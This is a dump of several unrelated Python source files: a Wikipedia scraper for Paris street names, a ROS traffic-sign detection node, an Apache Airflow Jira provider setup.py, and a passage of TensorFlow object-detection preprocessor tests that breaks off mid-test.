titles[1].text.startswith("Par type"), titles[1].text
all_li = titles[1].find_all_previous("li")
labels = [clean_comment(li.text) for li in all_li if clean_comment(li.text) != ""]
return labels
# From https://docs.python.org/3/library/itertools.html#itertools-recipes
def unique_justseen(iterable, key=None):
"List unique elements, preserving order. Remember only the element just seen."
# unique_justseen('AAAABBBCCDAABBB') --> A B C D A B
# unique_justseen('ABBCcAD', str.lower) --> A B C A D
return map(next, map(itemgetter(1), groupby(iterable, key)))
def save_csv(records):
SAVE_DIR = 'data'
SAVE_FILE = join(SAVE_DIR, 'paris-streets.csv')
if not exists(SAVE_DIR):
mkdir(SAVE_DIR);
HEADER = ['street','arrondissement','from_url']
writer = csv.writer(open(SAVE_FILE, 'w'), lineterminator='\n')
writer.writerow(HEADER)
writer.writerows(records)
URLS = [
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_1er_arrondissement_de_Paris", 1),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_2e_arrondissement_de_Paris", 2),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_3e_arrondissement_de_Paris", 3),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_4e_arrondissement_de_Paris", 4),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_5e_arrondissement_de_Paris", 5),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_6e_arrondissement_de_Paris", 6),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_7e_arrondissement_de_Paris", 7),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_8e_arrondissement_de_Paris", 8),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_9e_arrondissement_de_Paris", 9),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_10e_arrondissement_de_Paris", 10),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_11e_arrondissement_de_Paris", 11),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_12e_arrondissement_de_Paris", 12),
# ("https://fr.wikipedia.org/wiki/Liste_des_voies_du_bois_de_Vincennes", 12),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_13e_arrondissement_de_Paris", 13),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_14e_arrondissement_de_Paris", 14),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_15e_arrondissement_de_Paris", 15),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_16e_arrondissement_de_Paris", 16),
# ("https://fr.wikipedia.org/wiki/Liste_des_voies_du_bois_de_Boulogne", 16),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_17e_arrondissement_de_Paris", 17),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_18e_arrondissement_de_Paris", 18),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_19e_arrondissement_de_Paris", 19),
("https://fr.wikipedia.org/wiki/Liste_des_voies_du_20e_arrondissement_de_Paris", 20),
]
records = []
for (url, num_arrondissement) in URLS:
print("Scraping {}\n".format(url))
html = read_page(url)
arrondissement_records = [(street, num_arrondissement, url) for street in find_all_streets(html)]
# Sorting ensure easy tracking of modifications in git
arrondissement_records.sort(key=lambda s: s[0].lower())
records += unique_justseen(arrondissement_records)
save_csv(records)
|
py | 1a4a047ece9004bd674c758af39669c9497313b5 | #!/usr/bin/env python
import rospy
import json
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import Image, CompressedImage
import cv2
import numpy as np
from wr8_ai.yolo import fps
import wr8_ai.detector_ncs as det
import time
class ImageReceiverROS:
def __init__(self):
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("camera", Image, self.callback_img, queue_size=1)
self.image_sub = rospy.Subscriber("camera_compr", CompressedImage, self.callback_img_compressed, queue_size=1)
self.cv_image = None
self.cv_image_comp = None
def callback_img(self, data):
try:
self.cv_image = self.bridge.imgmsg_to_cv2(data, "bgr8")
except CvBridgeError as e:
rospy.logwarn(e)
def callback_img_compressed(self, data):
np_arr = np.fromstring(data.data, np.uint8)
self.cv_image_comp = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)
def get_image(self):
return self.cv_image
def get_image_compressed(self):
return self.cv_image_comp
class ImagePublisherROS:
def __init__(self):
self.bridge = CvBridge()
self.image_pub = rospy.Publisher("netout/compressed", CompressedImage)
def publish(self, cv_image):
msg = CompressedImage()
msg.header.stamp = rospy.Time.now()
msg.format = "png"
msg.data = np.array(cv2.imencode('.png', cv_image)[1]).tostring()
self.image_pub.publish(msg)
def main():
rospy.init_node('test_signs')
graph_path = rospy.get_param('~graph_path')
config_path = rospy.get_param('~config_path')
fps_msr = rospy.get_param('~fps_msr', True)
fps_meter = fps.FPSMeter()
rospy.loginfo('Start processing')
detector = det.DetectorNCS()
if not detector.init(0, graph_path, config_path):
rospy.logerr('Failed to initialize detector')
img_rcvr = ImageReceiverROS()
img_pub = ImagePublisherROS()
skip_cntr = 0
while not rospy.is_shutdown():
image = img_rcvr.get_image_compressed()
if image is None:
rospy.sleep(0.01) # 10 ms
skip_cntr += 1
if skip_cntr > 300:
rospy.logwarn('No image for 3 seconds...')
skip_cntr = 0
continue
render_img = image.copy()
start = time.time()
boxes, box_img = detector.get_signs(cv_img=image, render_img=render_img)
if fps_msr:
fps_meter.update(time.time() - start)
if fps_meter.milliseconds > 5000:
fps_meter.print_statistics()
fps_meter.reset()
img_pub.publish(box_img)
# cv2.imshow('2', image)
# key = cv2.waitKey(10)
# if key == 27:
# break
# cv2.destroyAllWindows()
if __name__ == '__main__':
main()
|
py | 1a4a05fc905beac0fdd2a167103ffa89a89c925a | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# NOTE! THIS FILE IS AUTOMATICALLY GENERATED AND WILL BE\
# OVERWRITTEN WHEN RUNNING
#
# ./breeze prepare-provider-readme
#
# IF YOU WANT TO MODIFY IT, YOU SHOULD MODIFY THE TEMPLATE
# `SETUP_TEMPLATE.py.jinja2` IN the `provider_packages` DIRECTORY
"""Setup.py for the apache-airflow-backport-providers-jira package."""
import logging
import os
import sys
from os.path import dirname
from setuptools import find_packages, setup
logger = logging.getLogger(__name__)
version = '2020.10.29'
my_dir = dirname(__file__)
try:
with open(
os.path.join(my_dir, 'airflow/providers/jira/BACKPORT_PROVIDER_README.md'), encoding='utf-8'
) as f:
long_description = f.read()
except FileNotFoundError:
long_description = ''
def do_setup(version_suffix_for_pypi=''):
"""Perform the package apache-airflow-backport-providers-jira setup."""
setup(
name='apache-airflow-backport-providers-jira',
description='Backport provider package apache-airflow-backport-providers-jira for Apache Airflow',
long_description=long_description,
long_description_content_type='text/markdown',
license='Apache License 2.0',
version=version + version_suffix_for_pypi,
packages=find_packages(include=['airflow.providers.jira*']),
zip_safe=False,
install_requires=['apache-airflow~=1.10', 'JIRA>1.0.7'],
setup_requires=['setuptools', 'wheel'],
extras_require={},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: System :: Monitoring',
],
author='Apache Software Foundation',
author_email='[email protected]',
url='http://airflow.apache.org/',
download_url=('https://archive.apache.org/dist/airflow/backport-providers'),
python_requires='~=3.6',
project_urls={
'Documentation': 'https://airflow.apache.org/docs/',
'Bug Tracker': 'https://github.com/apache/airflow/issues',
'Source Code': 'https://github.com/apache/airflow',
},
)
#
# Note that --version-suffix-for-pypi should only be used in case we generate RC packages for PyPI
# Those packages should have actual RC version in order to be published even if source version
# should be the final one.
#
if __name__ == "__main__":
suffix = ''
if len(sys.argv) > 1 and sys.argv[1] == "--version-suffix-for-pypi":
if len(sys.argv) < 3:
print("ERROR! --version-suffix-for-pypi needs parameter!", file=sys.stderr)
sys.exit(1)
suffix = sys.argv[2]
sys.argv = [sys.argv[0]] + sys.argv[3:]
do_setup(version_suffix_for_pypi=suffix)
|
py | 1a4a07e75d6da0c67f60815eb6557d1e2b2bf3c1 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for preprocessor_builder."""
import tensorflow as tf
from google.protobuf import text_format
from object_detection.builders import preprocessor_builder
from object_detection.core import preprocessor
from object_detection.protos import preprocessor_pb2
class PreprocessorBuilderTest(tf.test.TestCase):
def assert_dictionary_close(self, dict1, dict2):
"""Helper to check if two dicts with floatst or integers are close."""
self.assertEqual(sorted(dict1.keys()), sorted(dict2.keys()))
for key in dict1:
value = dict1[key]
if isinstance(value, float):
self.assertAlmostEqual(value, dict2[key])
else:
self.assertEqual(value, dict2[key])
def test_build_normalize_image(self):
preprocessor_text_proto = """
normalize_image {
original_minval: 0.0
original_maxval: 255.0
target_minval: -1.0
target_maxval: 1.0
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.normalize_image)
self.assertEqual(args, {
'original_minval': 0.0,
'original_maxval': 255.0,
'target_minval': -1.0,
'target_maxval': 1.0,
})
def test_build_random_horizontal_flip(self):
preprocessor_text_proto = """
random_horizontal_flip {
keypoint_flip_permutation: 1
keypoint_flip_permutation: 0
keypoint_flip_permutation: 2
keypoint_flip_permutation: 3
keypoint_flip_permutation: 5
keypoint_flip_permutation: 4
probability: 0.5
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_horizontal_flip)
self.assertEqual(args, {'keypoint_flip_permutation': (1, 0, 2, 3, 5, 4),
'probability': 0.5})
def test_build_random_vertical_flip(self):
preprocessor_text_proto = """
random_vertical_flip {
keypoint_flip_permutation: 1
keypoint_flip_permutation: 0
keypoint_flip_permutation: 2
keypoint_flip_permutation: 3
keypoint_flip_permutation: 5
keypoint_flip_permutation: 4
probability: 0.5
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_vertical_flip)
self.assertEqual(args, {'keypoint_flip_permutation': (1, 0, 2, 3, 5, 4),
'probability': 0.5})
def test_build_random_rotation90(self):
preprocessor_text_proto = """
random_rotation90 {
keypoint_rot_permutation: 3
keypoint_rot_permutation: 0
keypoint_rot_permutation: 1
keypoint_rot_permutation: 2
probability: 0.5
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_rotation90)
self.assertEqual(args, {'keypoint_rot_permutation': (3, 0, 1, 2),
'probability': 0.5})
def test_build_random_pixel_value_scale(self):
preprocessor_text_proto = """
random_pixel_value_scale {
minval: 0.8
maxval: 1.2
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_pixel_value_scale)
self.assert_dictionary_close(args, {'minval': 0.8, 'maxval': 1.2})
def test_build_random_image_scale(self):
preprocessor_text_proto = """
random_image_scale {
min_scale_ratio: 0.8
max_scale_ratio: 2.2
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_image_scale)
self.assert_dictionary_close(args, {'min_scale_ratio': 0.8,
'max_scale_ratio': 2.2})
def test_build_random_rgb_to_gray(self):
preprocessor_text_proto = """
random_rgb_to_gray {
probability: 0.8
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_rgb_to_gray)
self.assert_dictionary_close(args, {'probability': 0.8})
def test_build_random_adjust_brightness(self):
preprocessor_text_proto = """
random_adjust_brightness {
max_delta: 0.2
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_adjust_brightness)
self.assert_dictionary_close(args, {'max_delta': 0.2})
def test_build_random_adjust_contrast(self):
preprocessor_text_proto = """
random_adjust_contrast {
min_delta: 0.7
max_delta: 1.1
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_adjust_contrast)
self.assert_dictionary_close(args, {'min_delta': 0.7, 'max_delta': 1.1})
def test_build_random_adjust_hue(self):
preprocessor_text_proto = """
random_adjust_hue {
max_delta: 0.01
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_adjust_hue)
self.assert_dictionary_close(args, {'max_delta': 0.01})
def test_build_random_adjust_saturation(self):
preprocessor_text_proto = """
random_adjust_saturation {
min_delta: 0.75
max_delta: 1.15
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_adjust_saturation)
self.assert_dictionary_close(args, {'min_delta': 0.75, 'max_delta': 1.15})
def test_build_random_distort_color(self):
preprocessor_text_proto = """
random_distort_color {
color_ordering: 1
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_distort_color)
self.assertEqual(args, {'color_ordering': 1})
def test_build_random_jitter_boxes(self):
preprocessor_text_proto = """
random_jitter_boxes {
ratio: 0.1
jitter_mode: SHRINK
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_jitter_boxes)
self.assert_dictionary_close(args, {'ratio': 0.1, 'jitter_mode': 'shrink'})
def test_build_random_crop_image(self):
preprocessor_text_proto = """
random_crop_image {
min_object_covered: 0.75
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.25
max_area: 0.875
overlap_thresh: 0.5
clip_boxes: False
random_coef: 0.125
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_crop_image)
self.assertEqual(args, {
'min_object_covered': 0.75,
'aspect_ratio_range': (0.75, 1.5),
'area_range': (0.25, 0.875),
'overlap_thresh': 0.5,
'clip_boxes': False,
'random_coef': 0.125,
})
def test_build_random_pad_image(self):
preprocessor_text_proto = """
random_pad_image {
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_pad_image)
self.assertEqual(args, {
'min_image_size': None,
'max_image_size': None,
'pad_color': None,
})
def test_build_random_absolute_pad_image(self):
preprocessor_text_proto = """
random_absolute_pad_image {
max_height_padding: 50
max_width_padding: 100
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_absolute_pad_image)
self.assertEqual(args, {
'max_height_padding': 50,
'max_width_padding': 100,
'pad_color': None,
})
def test_build_random_crop_pad_image(self):
preprocessor_text_proto = """
random_crop_pad_image {
min_object_covered: 0.75
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.25
max_area: 0.875
overlap_thresh: 0.5
clip_boxes: False
random_coef: 0.125
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_crop_pad_image)
self.assertEqual(args, {
'min_object_covered': 0.75,
'aspect_ratio_range': (0.75, 1.5),
'area_range': (0.25, 0.875),
'overlap_thresh': 0.5,
'clip_boxes': False,
'random_coef': 0.125,
'pad_color': None,
})
def test_build_random_crop_pad_image_with_optional_parameters(self):
preprocessor_text_proto = """
random_crop_pad_image {
min_object_covered: 0.75
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.25
max_area: 0.875
overlap_thresh: 0.5
clip_boxes: False
random_coef: 0.125
min_padded_size_ratio: 0.5
min_padded_size_ratio: 0.75
max_padded_size_ratio: 0.5
max_padded_size_ratio: 0.75
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_crop_pad_image)
self.assertEqual(args, {
'min_object_covered': 0.75,
'aspect_ratio_range': (0.75, 1.5),
'area_range': (0.25, 0.875),
'overlap_thresh': 0.5,
'clip_boxes': False,
'random_coef': 0.125,
'min_padded_size_ratio': (0.5, 0.75),
'max_padded_size_ratio': (0.5, 0.75),
'pad_color': None,
})
def test_build_random_crop_to_aspect_ratio(self):
preprocessor_text_proto = """
random_crop_to_aspect_ratio {
aspect_ratio: 0.85
overlap_thresh: 0.35
clip_boxes: False
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_crop_to_aspect_ratio)
self.assert_dictionary_close(args, {'aspect_ratio': 0.85,
'overlap_thresh': 0.35,
'clip_boxes': False})
def test_build_random_black_patches(self):
preprocessor_text_proto = """
random_black_patches {
max_black_patches: 20
probability: 0.95
size_to_image_ratio: 0.12
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_black_patches)
self.assert_dictionary_close(args, {'max_black_patches': 20,
'probability': 0.95,
'size_to_image_ratio': 0.12})
def test_build_random_jpeg_quality(self):
preprocessor_text_proto = """
random_jpeg_quality {
random_coef: 0.5
min_jpeg_quality: 40
max_jpeg_quality: 90
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Parse(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_jpeg_quality)
self.assert_dictionary_close(args, {'random_coef': 0.5,
'min_jpeg_quality': 40,
'max_jpeg_quality': 90})
def test_build_random_downscale_to_target_pixels(self):
preprocessor_text_proto = """
random_downscale_to_target_pixels {
random_coef: 0.5
min_target_pixels: 200
max_target_pixels: 900
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Parse(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_downscale_to_target_pixels)
self.assert_dictionary_close(args, {
'random_coef': 0.5,
'min_target_pixels': 200,
'max_target_pixels': 900
})
def test_build_random_patch_gaussian(self):
preprocessor_text_proto = """
random_patch_gaussian {
random_coef: 0.5
min_patch_size: 10
max_patch_size: 300
min_gaussian_stddev: 0.2
max_gaussian_stddev: 1.5
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Parse(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_patch_gaussian)
self.assert_dictionary_close(args, {
'random_coef': 0.5,
'min_patch_size': 10,
'max_patch_size': 300,
'min_gaussian_stddev': 0.2,
'max_gaussian_stddev': 1.5
})
def test_auto_augment_image(self):
preprocessor_text_proto = """
autoaugment_image {
policy_name: 'v0'
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.autoaugment_image)
self.assert_dictionary_close(args, {'policy_name': 'v0'})
def test_drop_label_probabilistically(self):
preprocessor_text_proto = """
drop_label_probabilistically{
label: 2
drop_probability: 0.5
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.drop_label_probabilistically)
self.assert_dictionary_close(args, {
'dropped_label': 2,
'drop_probability': 0.5
})
def test_remap_labels(self):
preprocessor_text_proto = """
remap_labels{
original_labels: 1
original_labels: 2
new_label: 3
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.remap_labels)
self.assert_dictionary_close(args, {
'original_labels': [1, 2],
'new_label': 3
})
def test_build_random_resize_method(self):
preprocessor_text_proto = """
random_resize_method {
target_height: 75
target_width: 100
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_resize_method)
self.assert_dictionary_close(args, {'target_size': [75, 100]})
def test_build_scale_boxes_to_pixel_coordinates(self):
preprocessor_text_proto = """
scale_boxes_to_pixel_coordinates {}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.scale_boxes_to_pixel_coordinates)
self.assertEqual(args, {})
def test_build_resize_image(self):
preprocessor_text_proto = """
resize_image {
new_height: 75
new_width: 100
method: BICUBIC
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.resize_image)
self.assertEqual(args, {'new_height': 75,
'new_width': 100,
'method': tf.image.ResizeMethod.BICUBIC})
def test_build_rgb_to_gray(self):
preprocessor_text_proto = """
rgb_to_gray {}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.rgb_to_gray)
self.assertEqual(args, {})
def test_build_subtract_channel_mean(self):
preprocessor_text_proto = """
subtract_channel_mean {
means: [1.0, 2.0, 3.0]
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.subtract_channel_mean)
self.assertEqual(args, {'means': [1.0, 2.0, 3.0]})
def test_random_self_concat_image(self):
preprocessor_text_proto = """
random_self_concat_image {
concat_vertical_probability: 0.5
concat_horizontal_probability: 0.25
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_self_concat_image)
self.assertEqual(args, {'concat_vertical_probability': 0.5,
'concat_horizontal_probability': 0.25})
def test_build_ssd_random_crop(self):
preprocessor_text_proto = """
ssd_random_crop {
operations {
min_object_covered: 0.0
min_aspect_ratio: 0.875
max_aspect_ratio: 1.125
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.0
clip_boxes: False
random_coef: 0.375
}
operations {
min_object_covered: 0.25
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.25
clip_boxes: True
random_coef: 0.375
}
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.ssd_random_crop)
self.assertEqual(args, {'min_object_covered': [0.0, 0.25],
'aspect_ratio_range': [(0.875, 1.125), (0.75, 1.5)],
'area_range': [(0.5, 1.0), (0.5, 1.0)],
'overlap_thresh': [0.0, 0.25],
'clip_boxes': [False, True],
'random_coef': [0.375, 0.375]})
def test_build_ssd_random_crop_empty_operations(self):
preprocessor_text_proto = """
ssd_random_crop {
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.ssd_random_crop)
self.assertEqual(args, {})
def test_build_ssd_random_crop_pad(self):
preprocessor_text_proto = """
ssd_random_crop_pad {
operations {
min_object_covered: 0.0
min_aspect_ratio: 0.875
max_aspect_ratio: 1.125
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.0
clip_boxes: False
random_coef: 0.375
min_padded_size_ratio: [1.0, 1.0]
max_padded_size_ratio: [2.0, 2.0]
pad_color_r: 0.5
pad_color_g: 0.5
pad_color_b: 0.5
}
operations {
min_object_covered: 0.25
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.25
clip_boxes: True
random_coef: 0.375
min_padded_size_ratio: [1.0, 1.0]
max_padded_size_ratio: [2.0, 2.0]
pad_color_r: 0.5
pad_color_g: 0.5
pad_color_b: 0.5
}
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.ssd_random_crop_pad)
self.assertEqual(args, {'min_object_covered': [0.0, 0.25],
'aspect_ratio_range': [(0.875, 1.125), (0.75, 1.5)],
'area_range': [(0.5, 1.0), (0.5, 1.0)],
'overlap_thresh': [0.0, 0.25],
'clip_boxes': [False, True],
'random_coef': [0.375, 0.375],
'min_padded_size_ratio': [(1.0, 1.0), (1.0, 1.0)],
'max_padded_size_ratio': [(2.0, 2.0), (2.0, 2.0)],
'pad_color': [(0.5, 0.5, 0.5), (0.5, 0.5, 0.5)]})
def test_build_ssd_random_crop_fixed_aspect_ratio(self):
preprocessor_text_proto = """
ssd_random_crop_fixed_aspect_ratio {
operations {
min_object_covered: 0.0
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.0
clip_boxes: False
random_coef: 0.375
}
operations {
min_object_covered: 0.25
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.25
clip_boxes: True
random_coef: 0.375
}
aspect_ratio: 0.875
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.ssd_random_crop_fixed_aspect_ratio)
self.assertEqual(args, {'min_object_covered': [0.0, 0.25],
'aspect_ratio': 0.875,
'area_range': [(0.5, 1.0), (0.5, 1.0)],
'overlap_thresh': [0.0, 0.25],
'clip_boxes': [False, True],
'random_coef': [0.375, 0.375]})
def test_build_ssd_random_crop_pad_fixed_aspect_ratio(self):
preprocessor_text_proto = """
ssd_random_crop_pad_fixed_aspect_ratio {
operations {
min_object_covered: 0.0
min_aspect_ratio: 0.875
max_aspect_ratio: 1.125
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.0
clip_boxes: False
random_coef: 0.375
}
operations {
min_object_covered: 0.25
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.25
clip_boxes: True
random_coef: 0.375
}
aspect_ratio: 0.875
min_padded_size_ratio: [1.0, 1.0]
max_padded_size_ratio: [2.0, 2.0]
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function,
preprocessor.ssd_random_crop_pad_fixed_aspect_ratio)
self.assertEqual(args, {'min_object_covered': [0.0, 0.25],
'aspect_ratio': 0.875,
'aspect_ratio_range': [(0.875, 1.125), (0.75, 1.5)],
'area_range': [(0.5, 1.0), (0.5, 1.0)],
'overlap_thresh': [0.0, 0.25],
'clip_boxes': [False, True],
